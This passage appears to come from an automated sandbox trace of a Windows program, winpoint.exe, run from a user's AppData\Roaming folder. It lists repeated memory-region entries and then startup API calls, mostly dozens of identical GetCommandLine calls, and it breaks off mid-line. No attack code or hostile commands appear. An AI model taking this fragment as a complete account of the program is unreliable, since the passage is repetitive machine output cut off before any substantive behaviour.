0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1845 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1846 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1847 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1848 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1849 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1850 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1851 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1852 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1853 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1854 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1855 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1856 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1857 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1858 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1859 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1860 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1861 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1862 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1863 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1864 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1865 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1866 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1867 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1868 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1869 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1870 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1871 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1872 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1873 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1874 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1875 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1876 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1877 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1878 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1879 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1880 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1881 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1882 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1883 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1884 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1885 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1886 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1887 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1888 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1889 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1890 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1891 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1892 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1893 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1894 start_va = 0x380000 end_va = 0x387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 1895 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1896 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1897 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1898 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1899 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1900 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1901 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1902 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1903 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1904 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1905 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1906 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1907 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1908 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1909 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1910 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1911 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1912 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1913 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1914 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1915 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1916 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1917 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1918 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1919 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1920 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1921 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1922 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1923 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1924 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1929 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1930 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1931 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1932 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1933 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1934 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1935 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1936 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1937 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1938 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1939 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1940 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1941 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1942 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1943 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1944 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1945 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1946 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1947 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1948 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1949 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1950 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1951 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1952 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1953 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1954 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Thread: id = 60 os_tid = 0x650 [0161.635] __set_app_type (_Type=0x2) [0161.635] __p__fmode () returned 0x75c631f4 [0161.635] __p__commode () returned 0x75c631fc [0161.635] __wgetmainargs (in: _Argc=0x18ff28, _Argv=0x18ff18, _Env=0x18ff24, _DoWildCard=0, _StartInfo=0x18ff1c | out: _Argc=0x18ff28, _Argv=0x18ff18, _Env=0x18ff24) returned 0 [0161.638] GetStartupInfoW (in: lpStartupInfo=0x18ff2c | out: lpStartupInfo=0x18ff2c*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0161.638] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0161.638] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.638] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.638] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.638] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.638] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.638] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.638] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.638] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.638] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.638] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.638] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.638] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.638] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.638] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.638] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.638] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.638] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK 